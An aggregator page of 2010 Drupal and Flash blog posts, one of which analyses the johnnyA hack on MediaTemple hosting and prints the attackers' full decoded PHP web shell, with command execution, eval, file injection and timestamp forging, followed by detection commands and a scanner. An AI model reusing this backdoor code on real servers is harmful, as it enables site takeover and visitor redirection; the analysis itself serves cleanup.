Web Design and Development

Drupalcon SF 2010: DrupalCon Mobile Site is Live

Drupal Planet - Tue, 09/14/2010 - 17:00

Hello everyone: if your wireless drops or you do not have a laptop, just use your smartphone. The mobile site has a useful interface for viewing the schedule by day and by track.

I am hosting a BOF in room 206 at 4:15pm today (Monday) to present how we created the mobile version of the DrupalCon website. The mobile version loads automatically on all WebKit-based smartphones.

Pronovix: RDF Semantic Web is working and it could be running on Drupal - or also: we need more researchers!

Drupal Planet - Sat, 07/31/2010 - 22:52

Tonight a tweet from Laura Scott led me to a blog post by Zack Rosen at Semantic Focus. From the first sentence it seemed a bit odd: it has been more than 12 years since Tim Berners-Lee started working on the Semantic Web, and most if not all of the points that followed seemed outdated. Only at the end, in the comments, did it turn out that the article was actually from 2006 (a notice was added later).

Anyway, the article made me think about all the ways that Drupal is making the Semantic Web so much more attainable today.

Boris Mann: Being involved in the issue queue as a normal part of development

Drupal Planet - Sat, 07/31/2010 - 18:29

Patches that we write for drupal.org modules are submitted to the issue queue, and we refer to the patch's location on drupal.org in the make file. This has made us much better contributors to other people's projects, as it makes being involved in the issue queue a normal part of development, and it encourages us to only patch contrib modules where it's likely that the patch will be accepted. When a patch gets a review, we make changes, upload a newer version of the patch to drupal.org, and update our make file.

via developmentseed.org

This is actually a quote from Jeff in the comments on the article Drush Make Files for Production Drupal sites, but I thought it was definitely worth highlighting on its own.

Pronovix: Drupal the card game, 3rd edition

Drupal Planet - Sat, 07/31/2010 - 15:21

We really liked the concept of the Drupal card game pioneered by NodeOne. It is a great starting point for coaches to teach teams the value of collaboration. If you set up an external reward system (e.g. the winning team gets a bag of sweets) and let teams play a couple of games, you can make a meta-game in which teams experience the difference between playing styles (and therefore the value of collaboration).

For the Donation+ fundraising we wanted to give something back to our donors that would speak to their Drupal geekpride and that would be fun. We talked with Rustan Håkansson, the developer of the Drupal card game, who warned us that it is difficult to fine tune the rules of a game and that it is especially hard to come up with a game that will actually be enjoyable. Since the Drupal card game is licensed under a Creative Commons Attribution Share Alike license, we decided to make a reprint of the NodeOne card game.

Details of the johnnyA MediaTemple Hack

The Flash Blog - Sat, 07/31/2010 - 03:52

Update: MediaTemple directed me to another blog post with additional details. This highlights another problem with this incident: the information has been spread all over the place. While that post does give some good details, it still does not provide cleanup instructions. It simply says that all malicious files have been removed. I'm sorry to say that they have not.

If you have websites hosted on a MediaTemple (gs) then you may have been a victim of this annoying redirect hack, unofficially known as the johnnyA hack. It was once thought to be a WordPress issue, but static sites are affected as well. Essentially the attack works by injecting encoded JavaScript into your pages, and into JavaScript files those pages already load, that tries to redirect visitors to a malicious website or file.

After much searching, and with the help of this blog post, I have found the backdoor that is used to do the damage. (It is a PHP web shell rather than a rootkit: it runs as the web server user and needs no system-level access, which is exactly why it survives on shared hosting.) If you have been hacked you will find PHP files, created by the attackers, that consist of a bunch of compressed, base64-encoded source code. I decoded that into the actual attack code, which is listed below:

<?PHP
@ignore_user_abort(1);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@error_reporting(0);
@ini_set("memory_limit","16M");  

if (!function_exists('rand_checkstr'))
{
    function rand_checkstr()
    {
        $c5 = 1;
        $c3 = 8;          
        $e7 ="";    
        for ($f3=0;$f3<$c3;$f3++) {
            $c4 = mt_rand(1,7);        
            switch ($c4) {
                case ($c4<=2):
                    $e7 .= mt_rand(0,9);                
                    break;            
                case ($c4<=4):                      
                    $e7 .= chr(mt_rand(65,90));                
                    break;            
                case ($c4<=6):                                
                    $e7 .= chr(mt_rand(97,122));                
                    break;            
                case 7:                  
                    $e6 = strlen($e7);                
                    if ($c5>0&&$e6>0&&$e6<($c3-1)&&$e7[$e6-1]!="_")                
                    {                    
                        $e7 .= "_";                    
                        $c5--;                  
                    }                
                    else                
                    {                    
                        $f3--;                    
                        continue;                
                    }            
                    break;                
                }    
            }    
        return $e7;
    }
}

if (!function_exists('strrevpos'))
{
    function strrevpos($f4, $f6)
    {  
        $f5 = strpos (strrev($f4), strrev($f6));  
        if ($f5===false)
            return false;  
        else
            return strlen($f4) - $f5 - strlen($f6);
    }
}

if (!function_exists('after'))
{
    function after ($this, $d8)
    {  
        if (!is_bool(strpos($d8, $this)))  
            return substr($d8, strpos($d8,$this)+strlen($this));
    }
}

if (!function_exists('after_last'))
{
    function after_last ($this, $d8)
    {  
        if (!is_bool(strrevpos($d8, $this)))  
            return substr($d8, strrevpos($d8, $this)+strlen($this));
    }
}  

if (!function_exists('before'))
{
    function before ($this, $d8)
    {
        return substr($d8, 0, strpos($d8, $this));
    }
}

if (!function_exists('before_last'))
{
    function before_last ($this, $d8)
    {  
        return substr($d8, 0, strrevpos($d8, $this));
    }
}

if (!function_exists('between'))
{
    function between ($this, $f7, $d8)
    {  
        return before($f7, after($this, $d8));
    }
}

if (!function_exists('between_last'))
{
    function between_last ($this, $f7, $d8)
    {  
        return after_last($this, before_last($f7, $d8));
    }
}

if (!function_exists('stripslashes2'))
{
    function stripslashes2($d3)
    {    
        $d3 = str_replace('\\\\\\"', '\\"', $d3);    
        $d3 = str_replace("\\\'", "'", $d3);    
        $d3 = str_replace("\\\\\\\\", "\\\\", $d3);    
        return $d3;
    }
}

if (!function_exists('getfiles'))
{
    function getfiles($d4, $f1, $d5=0, $f8="\\")
    {
        if(!is_dir($d4))
        {
            return null;
        }
        $d9=($f8=="\\")?"/":$f8;
        $d4=str_replace($f8,$d9,$d4);
        $d4=str_replace("//",$d9,$d4);
        $d4=(strrpos($d4, $d9)==strlen($d4)-1)? substr($d4, 0, strlen($d4)-1):$d4;
        $e0=substr_count($d4, $d9);
        $d5=(!$d5)?-1:$d5+$e0;
        $e8=array();
        $d7=array( array($d4, $e0) );
        while(sizeof($d7) && $d7[0][1]!=$d5)
        {
            $d6=array_shift($d7);
            $f9=opendir($d6[0]);
            while( ($f0=readdir($f9))!==false )
            {
                if( strrpos($f0,".") === (strlen($f0)-1))
                {
                    continue;
                };
                $f2=$d6[0].$d9.$f0;
                if(is_dir($f2))
                {
                    $e9[]=$f2;
                    $d7[]=array( $f2, substr_count($f2, $d9) );
                }
                else
                {
                    foreach($f1 as $f3)
                    {
                        if(preg_match($f3,$f2))
                        {
                            $e8[]=$f2;break;
                        };
                    }
                };
            };
        }
        return $e8;
    }
}
   
if (!function_exists('checkcontent2'))
{
    function checkcontent2($g0)
    {  
        $e5 = array("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",      
        "Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9",      
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",      
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",      
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3",      
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.xx) Gecko/20030504 Mozilla Firebird/0.6",      
        "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5");  
       
        if (function_exists('curl_init'))  
        {  
            $g2 =  $e5[rand(0,count($e5)-1)];      
            $g1 = curl_init();    
            curl_setopt($g1, CURLOPT_URL, $g0);  
            curl_setopt($g1, CURLOPT_HEADER, 0);  
            curl_setopt($g1, CURLOPT_TIMEOUT, 30);  
            curl_setopt($g1, CURLOPT_RETURNTRANSFER, 1);  
            curl_setopt($g1, CURLOPT_USERAGENT, $g2);  
            curl_setopt($g1, CURLOPT_FOLLOWLOCATION, 1);  
            curl_setopt($g1, CURLOPT_MAXREDIRS, 2);      
            $g3 = curl_exec($g1);    
            curl_close($g1);      
            if ($g3 !== false)    
            {  
                 return $g3;  
            }  
        }  
        else if (ini_get('allow_url_fopen') == '1')  
        {  
            $g3 = file_get_contents($g0);  
            if ($g3 !== false)    
            {    
                return $g3;  
            }  
        }  
        else  
        {  
            echo "<h5 style='color:maroon'>Can't download ".$g0." - EXIT;</h5>";  
            exit;  
        }
    }
}  

if (!function_exists('getcode'))
{
    function getcode($g4,$d0)
    {  
        $c8 = '';    
        if(preg_match("/$d0/",$g4))  
        {  
            $c8 = preg_replace("/.*<b1><!--|$d0|--><\/b1>.*/msi","",$g4);  
        }  
        return $c8;
    }
}

$d1 = array("(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)");
$a7 = array("/<ad>.*<\/ad>/si",
"/<ads>.*<\/ads>/si",
"/<bb1>.*<bb2>/si",
"/<b1>.*<\/b1>/si",
"/<bb1><bb1>/si",
"/<bb2><bb2>/si",
"/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/wpfooterz.*wpfooterz/si",
"/<a.*style\s*=.*(top|left)\s*:\s*-[0-9]{3,5}.*>.*<\/a>/Ui",
"/<a.*(viagra|cialis|phentermine|vioxx|hydrocodon|oxycontin|levitra|ambien|xanax|adipex|cheap pills|paxil|Codeine|vicodin|tramadol|tadalafil|carisoprodol|mesothelioma|lorazepam|propecia|protonix|prozac|prescription|buy cheap|zithromax)+.*><\/a>/i");

if (isset($_REQUEST['update1']))
{  
    $b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['update1'])));    
    $b0 = $b4[0];  
    $b5 = explode(',',$b4[1]);    
    foreach($b5 as $a3)  
    {  
        if (strlen($b0) > 1)
            $b0 = "<ads>".$b0."</ads>";      
        $a2 = false;  
        $a5 = false;      
        if (!is_writable($a3))
            @chmod($a3, 0644);      
        if (file_exists($a3) && is_writable($a3))  
        {    
            $b7 = false;    
            if (eregi(".htm",$a3) !== false || eregi(".shtm",$a3) !== false)
                $b7 = true;        
            $a1 = trim(file_get_contents($a3));        
            foreach($a7 as $c2)    
            {    
                if (preg_match($c2, $a1))    
                {      
                    $a1 = preg_replace($c2, "", $a1);      
                    $a5 = true;    
                }    
            }        
            if (preg_match("/<body(.*)?>/i",$a1,$a9))    
            {    
                $a0=$a9[0];    
                $a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);    
                $a2 = true;    
            }    
            else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))    
            {    
                $a0=$a9[0];    
                $a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);    
                $a2 = true;    
            }    
            else if (preg_match("/<\/html>/i",$a1,$a9))    
            {    
                $a0="</body>".$a9[0];    
                $a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);    
                $a2 = true;    
            }    
            else if ($b7 == true)    
            {    
                $a0=$b0."</body></html>";    
                $a1.=$a0;    
                $a2 = true;    
            }        
            if ($a2 == true || $a5 == true)    
            {    
                $a4 = @filemtime($a3);          
                $b1 = fopen($a3, "w+");    
                fwrite($b1, $a1);    
                fclose($b1);          
                @touch($a3,$a4,$a4);          
                if ($a2 == true)
                    echo "<pre>update $a3</pre>";    
                if ($a5 == true)
                    echo "<pre>spam removed $a3</pre>";    
            }  
        }  
        else  
        {    
            if (!file_exists($a3))
                echo "<pre>no file $a3</pre>";  
            else if (!is_writable($a3))
                echo "<pre>no rw file $a3</pre>";  
        }  
    }
}  

if (isset($_REQUEST['update2']))
{  
    $b0 = gzinflate(base64_decode($_REQUEST['update2']));    
    $a6 = $_SERVER['SCRIPT_FILENAME'];  
    $b6 = before_last('/',$a6);  
    if (!is_writable($b6))
        @chmod($b6, 0644);  
    $b8 = @filemtime($b6);  
    @copy($a6,$a6.'1.php');  
    @touch($b6,$b8,$b8);  
    @touch($a6.'1.php',$b8,$b8);    
    if (!is_writable($a6))
        @chmod($a6, 0644);  
    if (is_writable($a6))  
    {  
        $a1 = trim(file_get_contents($a6));  
        $b3 = preg_replace('/^\<\?php.*\?\>/Usi','',$a1);      
        $a4 = @filemtime($a6);      
        $b1 = fopen($a6, "w");  
        fwrite($b1, $b0.$b3);  
        fclose($b1);    
        @touch($a6,$a4,$a4);      
        echo "<pre>update</pre>";  
    }  
    else  
    {  
        echo "<pre>no rw $a3</pre>";  
    }
}  

if (isset($_REQUEST['update3']))
{  
    echo "<pre>";  
    $a8 = $_REQUEST['update3'];  
    $b4 = '';  
    if (!empty($a8))  
    {  
        if(function_exists('exec'))  
        {    
            @exec($a8,$b4);    
            $b4 = join("\n",$b4);  
        }  
        elseif(function_exists('shell_exec'))  
        {    
            $b4 = @shell_exec($a8);  
        }  
        elseif(function_exists('system'))  
        {  
             @ob_start();    
             @system($a8);    
             $b4 = @ob_get_contents();    
             @ob_end_clean();  
        }  
        elseif(function_exists('passthru'))  
        {    
            @ob_start();    
            @passthru($a8);    
            $b4 = @ob_get_contents();    
            @ob_end_clean();  
        }  
        elseif(@is_resource($b2 = @popen($a8,"r")))  
        {  
            $b4 = "";  
            while(!@feof($b2))
            {
                $b4 .= @fread($b2,1024);
            }  
            @pclose($b2);  
        }  
    }  
    echo $b4;  
    echo "</pre>";
}  

if (isset($_REQUEST['add1']))
{  
    $b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['add1'])));    
    $b0 = $b4[0];  $b5 = explode(',',$b4[1]);    
    foreach($b5 as $a3)  
    {  
        $a2 = false;  
        $a5 = false;      
        if (!is_writable($a3))
            @chmod($a3, 0644);      
        if (file_exists($a3) && is_writable($a3))  
        {    
            $a1 = trim(file_get_contents($a3));    
            $a1 = preg_replace("/var\sst1(.*)gr0\=0\;/i", "", $a1);        
            $a1=$b0.$a1;    
            $a4 = @filemtime($a3);        
            $b1 = fopen($a3, "w");    
            fwrite($b1, $a1);    
            fclose($b1);        
            @touch($a3,$a4,$a4);        
            echo "<pre>update $a3</pre>";  
        }  
        else  
        {    
            if (!file_exists($a3))
                echo "<pre>no file $a3</pre>";    
            else if (!is_writable($a3))
                echo "<pre>no w file $a3</pre>";  
        }  
    }
}  
   
if (isset($_REQUEST["ev1"]))
{
    $b9=base64_decode($_REQUEST["ev1"]);
    if (isset($_REQUEST["s"]))
    {
        $b9=stripslashes2($b9);
    };  
    eval($b9);  
    exit();
}  

if (isset($_REQUEST["info1"]))  
{  
    $c0 = 'dGVzdDEyNw==';  
    $c1 = @get_current_user();  
    echo "<!--".base64_decode($c0)."(($c1))-->";  
    exit;
}  

if (isset($_REQUEST["get1"]))
{  
    get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get1']) : $c6 = $_REQUEST['get1'];  
    $d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);  
    $d0 = rand_checkstr();  
    $e1 = array("((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\.|^auth.*\.|^.*footer.*\.|^home.*\.|^.*templ.*\.|^inc.*\.|^page.*\.|^hyperseek.*\.|^Output.*\.|^comment.*\.|^uifunctions.*\.|^bottom.*\.|^infocus.*\.)(ph.*$|htm.*$|shtm.*$|asp.*$|jsp$|jhtml$|cfm$|tpl$|inc$|pl$|templ.*$|xml$|sht$|ctp$))");    
    $b5 = getfiles($d2, $e1, 4);    
    foreach($b5 as $a3)  
    {  
        $a2 = false;  
        $a5 = false;      
        if (file_exists($a3))  
        {    
            if (!is_writable($a3))
                @chmod($a3, 0644);    
            if (is_writable($a3))    
            {    
                $e2 = base64_encode(gzcompress($a3,9));          
                $b0 ="<b1><!--".$d0.$e2."--></b1>";          
                $a1 = trim(file_get_contents($a3));          
                foreach($a7 as $c2)    
                {      
                    if (preg_match($c2, $a1))      
                    {      
                        $a1 = preg_replace($c2, "", $a1);      
                        $a5 = true;      
                    }    
                }    
                if (preg_match("/<body(.*)?>/i",$a1,$a9))    
                {      
                    $a0=$a9[0];      
                    $a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);      
                    $a2 = true;    
                }    
                else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))    
                {      
                    $a0=$a9[0];      
                    $a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);      
                    $a2 = true;    
                }    
                else if (preg_match("/<\/html>/i",$a1,$a9))    
                {      
                    $a0="</body>".$a9[0];      
                    $a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);      
                    $a2 = true;    
                }          
                if ($a2 == true || $a5 == true)    
                {      
                    $a4 = @filemtime($a3);            
                    $b1 = @fopen($a3, "w+");      
                    @fwrite($b1, $a1);      
                    @fclose($b1);            
                    @touch($a3,$a4,$a4);    
                }    
            }  
        }  
    }  
    $c9 = checkcontent2($c6);  
    if (eregi($d0, $c9))  
    {  
        $c9 = gzuncompress(base64_decode(getcode($c9,$d0)));      
        echo $c9;  
    }    
    foreach($b5 as $a3)  
    {  
        $a5 = false;      
        if (file_exists($a3))  
        {    
            if (!is_writable($a3))
                @chmod($a3, 0644);    
            if (is_writable($a3))    
            {    
                $a1 = trim(file_get_contents($a3));          
                foreach($a7 as $c2)    
                {      
                    if (preg_match($c2, $a1))      
                    {      
                        $a1 = preg_replace($c2, "", $a1);      
                        $a5 = true;      
                    }    
                }    
                if ($a5 == true)
                {
                    $a4 = @filemtime($a3);
                    $b1 = @fopen($a3, "w+");
                    @fwrite($b1, $a1);
                    @fclose($b1);
                    @touch($a3,$a4,$a4);
                }
            }
        }
    }
    exit;
}

if (isset($_REQUEST["get2"]))
{  
    $e3 = array();  
    get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get2']) : $c6 = $_REQUEST['get2'];  
    $d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);    
    $c7 = checkcontent2($c6);
    $c6 = preg_replace("/^www\./i", "", $c6);  
    preg_match_all("/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", $c7,$c8);    
    foreach ($c8[2] as $e4)  
    {  
        if (preg_match('/^http/i',$e4))  
        {    
            if (preg_match("/$c6/i",$e4))    
            {    
                $b2 = $d2.after($c6,$e4);    
                if (file_exists($b2))
                    $e3[] = $b2;    
            }  
        }  
        else  
        {    
            $b2 = $d2.'/'.$e4;    
            if (file_exists($b2))
                $e3[] = $b2;  
        }  
    }    
           
    echo ($e3[rand(0,count($e3)-1)]);  
    exit;
}

?>

It looks like the attackers simply request this PHP file directly and choose what it does with a request parameter; it reads $_REQUEST, so GET and POST both work. Reading through the handlers in the decoded code, this is what each parameter does:

update1: the value is base64-encoded, deflate-compressed text that is split on "EXPC" into a payload and a comma-separated list of file paths. The payload is wrapped in <ads>...</ads> and written right after the <body> tag of every listed file (or before </body> or </html>; .htm and .shtm files with neither tag get the payload appended). Before inserting, it strips anything matching the $a7 patterns, which cover its own <ads> and <b1> wrappers as well as hidden-link and pharma-spam markup, so it evicts competing spam on the way in.

update2: replaces the shell's own code with the PHP in the parameter, after first copying itself to a file with "1.php" appended to its name. A "cleaned" host may still be holding that backup copy.

update3: runs an arbitrary command, trying exec, shell_exec, system, passthru and popen in turn, and prints the output. That is full remote command execution as the web server user.

add1: same payload-and-file-list format as update1, but the payload is prepended to each file after removing any earlier copy matching var st1 ... gr0=0;. This is how the redirect JavaScript gets into the site's .js files, and how the attackers swap it for a new version later.

ev1: eval() of base64-decoded PHP taken straight from the parameter.

info1: prints the HTML comment <!--test127((user))--> (dGVzdDEyNw== is "test127" in base64) with the name of the account the script runs as. That is a beacon: requesting every planted URL with info1 set tells the attackers which shells are still alive and who they run as.

get1: takes a URL, walks the document root up to four levels deep for files named like index, default, main, home, login, footer, bottom, content, template and so on, injects a unique <b1><!-- marker --></b1> into each one, fetches the URL with a randomly chosen browser User-Agent, and prints the path of the file whose marker came back in the page. It then removes the markers again. In other words, it maps a public URL to the local template file that renders it.

get2: fetches a URL, collects the <script src="...js"> references in the response, and prints one of them that exists on the local disk. That is the target selection step for add1.

Two details matter when you clean up. Every write is followed by @touch($file, $mtime, $mtime), which puts the original modification time back, so find -newer, ls -lt and "recently modified" views in the control panel will not show which files were touched; compare against a known-good copy instead. And everything runs under error_reporting(0) with @-suppressed calls, so expect nothing in the PHP error log. I'm no PHP wizard, so let me know if you find something else in there.

So how do you find these PHP files? SSH in, change to your site's root directory and run:

grep -Rl --include='*.php' -E '[A-Za-z0-9/+]{255,}' .

This lists every PHP file that contains an unbroken run of 255 or more base64-alphabet characters, which is what the encoded payload looks like. A note on the flags: -l prints file names instead of every matching line, -i is unnecessary because the character class already covers both cases, and "." rather than "*" makes grep descend into hidden directories, which a shell glob skips. Expect a few false positives from legitimately embedded data (bundled libraries, data URIs, serialized caches), so confirm a hit by decoding the string rather than deleting on sight. Also remember that this only finds the shell itself, not what it wrote: check your .js, .html and template files for the <ads>...</ads>, <b1><!--...--></b1> and var st1 ... gr0=0; blocks that the handlers above leave behind.
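
As an added example (my code, not the post's and not the attacker's), here is a scanner that does what the grep does and goes two steps further: it base64-decodes and inflates each long run it finds and looks inside for the handler names, the eval/exec calls, the @touch($f,$t,$t) timestamp restore and the test127 beacon string from the sample above, and it also checks .js and .html files for the <ads>, <b1> and var st1 ... gr0=0; markers the shell writes. The backdoor file, infected script and page it scans are constructed stand-ins written for the demo and modelled on the decoded sample; "redirect.example", ".cache/dropped.php" and the other file names are placeholders, not known indicators.

```python
# Added example, not part of the post and not the attacker's code: scan a web root for the
# johnnyA shell and its injected markers. Indicators come from the decoded sample above.
import base64, os, re, tempfile, zlib

# What the post's grep looks for: a run of 255+ base64-alphabet characters.
LONG_B64 = re.compile(rb"[A-Za-z0-9+/]{255,}={0,2}")
# Constructs lifted from the decoded sample above.
PHP_INDICATORS = {
    "request_handler": re.compile(rb"\$_REQUEST\[['\"](update[123]|add1|ev1|info1|get[12])['\"]\]"),
    "eval_of_request": re.compile(rb"eval\(\s*(\$\w+|base64_decode\()"),
    "command_exec": re.compile(rb"@?(exec|shell_exec|system|passthru|popen)\(\s*\$\w+"),
    "mtime_restore": re.compile(rb"@touch\(\s*\$\w+\s*,\s*\$\w+\s*,\s*\$\w+\s*\)"),
    "packed_payload": re.compile(rb"gzinflate\(\s*base64_decode\("),
    "info1_beacon": re.compile(rb"dGVzdDEyNw=="),  # base64("test127"), the info1 reply
}
# Markers the shell writes into the pages and scripts it modifies.
CONTENT_INDICATORS = {
    "ads_block": re.compile(rb"<ads>.*?</ads>", re.S),                 # update1 wrapper
    "b1_probe": re.compile(rb"<b1><!--.*?--></b1>", re.S),             # get1 probe marker
    "js_redirect": re.compile(rb"var\s+st1.*?gr0=0;", re.S | re.I),   # add1 payload bounds
}
SCAN_EXT = {".php": True, ".phtml": True, ".html": False, ".htm": False, ".js": False}  # ext -> is_php

def unpack_layer(blob: bytes):
    """base64-decode, then try raw deflate (gzinflate), zlib (gzuncompress) and gzip."""
    try:
        raw = base64.b64decode(blob + b"=" * (-len(blob) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError: not base64 at all
        return None
    for wbits in (-15, 15, 31):
        try:
            return zlib.decompress(raw, wbits)
        except zlib.error:
            pass
    return raw  # plain base64, the form the ev1 handler takes

def scan_bytes(data: bytes, is_php: bool) -> list:
    """Indicator names hit in one file; long base64 runs are unpacked for PHP files."""
    hits = {n for n, rx in CONTENT_INDICATORS.items() if rx.search(data)}
    if is_php:
        hits |= {n for n, rx in PHP_INDICATORS.items() if rx.search(data)}
        for run in LONG_B64.finditer(data):
            hits.add("long_base64_run")
            layer = unpack_layer(run.group(0)) or b""
            hits |= {"packed:" + n for n, rx in PHP_INDICATORS.items() if rx.search(layer)}
    return sorted(hits)

def scan_tree(root: str) -> dict:
    """Map each suspicious path under root (hidden dirs included; a shell '*' skips them) to its hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            ext = os.path.splitext(fname)[1].lower()
            if ext in SCAN_EXT:
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    hits = scan_bytes(fh.read(), SCAN_EXT[ext])
                if hits:
                    findings[os.path.relpath(path, root)] = hits
    return findings

# ---- constructed demo data: stand-ins modelled on the sample, not the real dropped files ----
INNER_PHP = b"""@ignore_user_abort(1); @set_time_limit(0); @error_reporting(0);
if (isset($_REQUEST['update3'])) { @exec($_REQUEST['update3'], $out); echo join("\\n", $out); }
if (isset($_REQUEST["ev1"])) { $code = base64_decode($_REQUEST["ev1"]); eval($code); exit(); }
if (isset($_REQUEST["info1"])) { echo "<!--".base64_decode('dGVzdDEyNw==')."((".@get_current_user()."))-->"; exit; }
if (isset($_REQUEST['add1'])) {
  list($payload, $list) = explode("EXPC", gzinflate(base64_decode($_REQUEST['add1'])));
  foreach (explode(',', $list) as $f) {
    $mt = @filemtime($f); $h = fopen($f, "w"); fwrite($h, $payload.file_get_contents($f)); fclose($h);
    @touch($f, $mt, $mt); // put mtime/atime back so find -newer never sees the edit
  }
}
"""
INFECTED_JS = b"var st1=document.createElement('script');st1.src='//redirect.example/r.js';document.body.appendChild(st1);var gr0=0;\nfunction legit() { return 1; }\n"
INFECTED_HTML = b"<html><body><ads><script>/* injected */</script></ads><p>hi</p></body></html>\n"
CLEAN_PHP = b"<?php echo 'hello'; ?>\n"

def pack_like_attacker(php: bytes) -> bytes:
    """eval(gzinflate(base64_decode(...))) wrapper, the form the dropped files take."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate is what PHP gzinflate expects
    raw = comp.compress(php) + comp.flush()
    return b'<?php eval(gzinflate(base64_decode("' + base64.b64encode(raw) + b'"))); ?>\n'

def build_demo_root() -> str:
    """Write the constructed files (shell in a hidden dir) into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="johnnya-demo-")
    files = {"index.php": CLEAN_PHP, ".cache/dropped.php": pack_like_attacker(INNER_PHP), "js/site.js": INFECTED_JS, "about.html": INFECTED_HTML}
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(build_demo_root()).items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it and it prints each flagged path with its indicators; the clean index.php is not reported. A long_base64_run hit on its own is only a lead, exactly as the grep's hits are; a packed:command_exec or packed:eval_of_request hit is the shell. Point scan_tree at the real document root to use it for cleanup, and remember the mtime caveat above: the scanner deliberately ignores timestamps because the shell forges them.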

My big question is for MediaTemple. What the hell are you guys doing? Why are we having to dig around for this information? Surely you have determined the same things so why are you not telling people how to clean it up? This official blog post from MediaTemple is vague and tells us nothing about how to actually clean our servers up. Do your job!

BenBuckman.net: Customizing Drupal date field with hook_form_alter and #after_build

Drupal Planet - Fri, 07/30/2010 - 23:57

I spent a long time today trying to figure out how to customize a Date field in Drupal 6. The field is called field_recurring_dates and looked like this:

Dale McGladdery: The Examples for Developers Module

Drupal Planet - Fri, 07/30/2010 - 22:21

An example, like a picture, is worth 1000 words. Until recently Drupal programming examples existed but were spread among documentation pages, blog posts, and the Drupal CVS repository; some searching required. That changed in late 2009 with the introduction of the Examples for Developers module. Its purpose: "to provide high-quality, well-documented API examples for a broad range of Drupal core functionality". Now you can find high-quality, working Drupal 6 and 7 code examples in one place, many with SimpleTests.

The Examples for Developers Module, or simply Examples Module, is actually a collection of modules. Each sub-module contains a single, specific example of how to use an API or implement a feature. At the time of writing there are 17 examples:

New Tutorial on Flash to HTML5 Video Fallback

The Flash Blog - Fri, 07/30/2010 - 21:27

I just uploaded a new tutorial that shows you how to provide an HTML5 video fallback option for devices that do not support the Flash Player. The tutorial also shows you how to use the new Flash Media Playback component for quickly adding video to your websites. If getting your video out to the largest number of people is your goal, providing an HTML5 fallback is an absolute necessity.

Marek Sotak: Drupal theming nightmares part 2

Drupal Planet - Fri, 07/30/2010 - 20:33


Welcome to the second part of the Drupal theming nightmares series. I was not really surprised by the feedback I got on the previous post: most of you were lucky enough to have stumbled on the same problems. While that post focused on theming mistakes, it also raised a discussion about unfinished jobs. So if you haven't read it, it is right here: Drupal theming nightmares part 1.

That day, when I found out what I would be working with, I wasn't able to fall asleep (and it wasn't because of the litres of green tea I had). I was thinking about the person or company that wrote it: are they haunted in their dreams, do they even care? They should, you should, we all should. Take some responsibility for what you are doing. Do it right. I tend to ask people: "Would an architect build a house ignoring physics?" Of course not; if he did, people might die. In our binary world we say kittens might die. Familiar, right? But this could be another blog post. Let's move on.

Karl Scheirer: using RewriteMap

Drupal Planet - Fri, 07/30/2010 - 19:56

This is an Apache Directive that I've never had to use before, but it came in very handy for a very specific problem.

There was already an apache redirect (RewriteRule + RewriteCond) in place, but the destination URL was case sensitive! That's not normally a problem, but it was for an ad server, and the variables were coming in as uppercase, but needed to be lowercase after the redirect. Bad programming on the part of the ad server in my opinion, but we're not going to let that stop us! :)

RewriteMap to the rescue!

First off, the actual directive is a lot like a function definition, and it can only go in a config file or vhost; it's not allowed in a .htaccess file. Luckily the one we want to use is built in, so we just make it available with:

RewriteMap lc int:tolower

This makes the "lc" function available in our rewrite rules. We start off with the condition and basic rule ...

Acquia: Membase and Drupal

